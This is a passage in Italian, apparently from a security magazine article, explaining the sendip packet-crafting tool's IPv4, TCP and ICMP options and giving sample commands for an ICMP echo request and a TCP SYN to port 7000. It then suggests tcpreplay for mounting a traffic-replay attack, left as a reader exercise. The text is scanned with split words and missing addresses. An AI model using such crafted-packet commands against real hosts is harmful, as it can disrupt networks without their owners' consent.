vista) parametri IPv4 (opzione -p ipv4) sono: -is indirizzo indirizzo di partenza, -id indirizzo indirizzo d arrivo. I parametri più importanti TCP (-p tcp) sono: -ts porta d uscita, -td porta d arrivo, -tfs 1/0 il controllo della fl ag SYN (attiva volutamente!). I parametri più impotranti ICMP (-p icmp) sono: -ct typ tipo del messaggio ICMP (volutamente echo request). Ecco un esempio dell invio del pacchetto echo request all indirizzo: # sendip -p ipv4 -is \ -p icmp Il pacchetto TCP SYN allo stesso indirizzo, con porta d arrivo 7000, può essere inviato in questo modo: # sendip -p ipv4 -is \ -p tcp -td 7000 Il programma sendip invia il pacchetto, dopodiché fi nisce il lavoro. Per organizzare un attacco possiamo scrivere un semplice script shell, ma la sua effi cienza darà molto a desiderare, quindi utilizzeremo un altro strumento. Suggeriamo l utilizzo del programma tcreplay ( tcpreplay.sourceforge.net) il quale tiene conto del traffi co in rete registrato da tcpdump. Un esempio concreto di realizzazione di un attacco del genere lo lasciamo come esercizio ai nostri lettori più curiosi. 19